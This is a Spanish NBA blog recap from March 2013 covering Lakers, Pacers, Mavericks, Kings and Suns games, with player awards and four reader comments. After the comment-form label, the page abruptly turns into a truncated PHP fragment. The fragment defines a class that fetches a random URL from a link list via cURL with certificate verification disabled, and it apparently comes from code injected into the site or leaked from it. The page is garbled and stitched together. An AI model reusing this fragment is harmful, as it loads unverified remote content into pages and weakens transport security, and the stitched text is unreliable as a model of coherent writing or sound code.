La Crónica: A marchas forzadas

29 de March de 2013 por Viva_Dirk

Los Angeles Lakers perdieron en Milwaukee y además, vieron como Nash y Kobe se retiraban con molestias. Esta fase de la temporada debería haber servido a estos ilustres veteranos para dosificar de cara a playoffs pero la pésima temporada del equipo hace que ahora tengan que dejarse hasta la última gota de sudor para ganar a cualquiera e intentar jugar la postemporada. Como digo, perdieron frente a los Bucks con récord anotador en la carrera de Larry Sanders con 21 puntos en un gran partido de todos los titulares locales. Los Bucks superaron a los Lakers en todas las facetas del juego: tuvieron mejores porcentajes de tiros de campo y de triples, cogieron más rebotes, dieron más asistencias, perdieron menos balones y robaron más (103-113).

Por suerte para los amarillos, los Pacers  les echaron un cable ganando de 25 en Dallas (103-78). Un gran día desde la linea de 3 unido a su gran defensa bastó para finiquitar el partido. Volvió David West aunque algo flojo. Paul George y Roy Hibbert fueron los mejores. A este último se le ve muy cómodo al lado de Tyler Hansbrough, jugador de mayor implicación en defensa que protege de faltas al hombre grande de Indiana y hace labores que no le van tanto. En los Mavs solo Nowitzki estuvo bien, con buenos momentos de Collison desde el banco. Por contra, OJ Mayo jugó de nuevo un mal partido. En los 10 últimos apenas llega a los 10 puntos de media. 

En Phoenix asistieron a uno de esos deslumbrantes partido de DeMarcus Cousins. El joven center fue un vendaval imparable que acabó con 34 puntos y 14 rebotes con porcentajes insultantes, incluido un 9 de 9 en tiros libres y un 1 de 2 en triples. Algo menor fue la actuación de Isaiah Thomas aunque tambien más que digna de mención, como lo esta siendo su final de temporada. En Phoenix el mejor fue Scola, con buenos números de PJ Tucker y Michael Beasley, todos dirigidos por Kendall Marshall que esta aprovechando la lesión de Dragic para dejar ver su enorme clase, casi tanta como inexperiencia pero que muestran un base como quedan pocos (117-103).

PREMIOS

MVP: Demarcus Cousins hizo lo que quiso, lo que lleva a preguntarse si algún día querrá únicamente jugar al baloncesto. os que sí tenemos claro que son grandes profesionales son Paul GeorgeLarry Sanders  y su progresión este año ha sido enorme. El alero acabó con 24-8-6 y el center con 21-13 frente a Howard.

Rookie: Kendall Marshall anotó 9 puntos y repartió 10 asistencias pero hizo un 4 de 12 en tiros.

Sorpresa: Buen dia para PJ Tucker con 18 puntos, 4 rebotes, 3 asistencias y 3 robos, con 8 de 13 en tiros.

Decepción: OJ Mayo ha entrado en un bache. Anoche se quedó en 7 puntos, con 3 de 10 en tiros y sin forzar un solo tiro libre. Aunque para decepción el rendimiento colectivo de los Lakers.

Esfuerzo en vano: La palabra esfuerzo la lleva Kobe Bryant grabada a fuego. Cuando otros estarían quejándose amargamente o intentando recuperarse totalmente de sus múltiples molestias, él se deja la piel. Fue nada menos que 20 veces a la línea de tiros libres y metió 18 para acabar con 30 puntos. Otros 2 viejos rockeros completan el podio, Dirk Nowitzki y Luis Scola fueron los mejores de sus equipos.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Si nos quejamos de Rondo o Ricky como jugadores que tienen un déficit en el tiro,K.Marshall es aún peor en ese apartado,debe mejorar un mundo para ser base titular de un equipo NBA.Evidentemente la dirección del equipo la tiene y es su principal virtud pero lo otro es un agujero enorme.

    Lo de Lakers-Utah-Dallas es RIDÍCULO.Te levantas,sabes que los Lakers deben apurar para confirmarse en PO y ven que llevan una racha impropia para ese objetivo,después ves que Utah que lo hace de pena gana sin querer y vuelve a tener opciones y que Dallas encaja en casa una soberana paliza.Carlisle tuvo mérito cuando ganó pero esta temporada vaya trio de ases que forma junto a Corbin y D’Antoni.

      Citar

  2. nba dice:
    #2

    Me niego a que Carlisle y Corbin , esten incluidos en el mismo pack que D’antoni al que habria que ponerle una categoria aparte.
    Cualquier otro entrenador de la liga, cualquiera, salvo del Negro o Spoelstra , tendrían con esta plantilla a los Lakers peleando por el cuarto puesto del Oeste, en vez de estar rezando para que el resto pinchen…

      Citar

  3. Ruxixón dice:
    #3

    nba:
    Me niego a que Carlisle y Corbin , esten incluidos en el mismo pack que D’antoni al que habria que ponerle una categoria aparte.
    Cualquier otro entrenador de la liga, cualquiera, salvo del Negro o Spoelstra , tendrían con esta plantilla a los Lakers peleando por el cuarto puesto del Oeste, en vez de estar rezando para que el resto pinchen…

    Hombre,la diferencia entre unos y otros es que en el caso de Lakers ha hecho un equipo competitivo y en Dallas y Utah hay carencias que no se han tapado desde las oficinas pero valorando las rotaciones,tácticas…tela

      Citar

  4. Esteban dice:
    #4

    Disculpa nba pero es una chorrada lo q dices

    Por otra parte, lo de dl negro es mala prensa, de otra forma no ntiendo por q es tan despreciado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>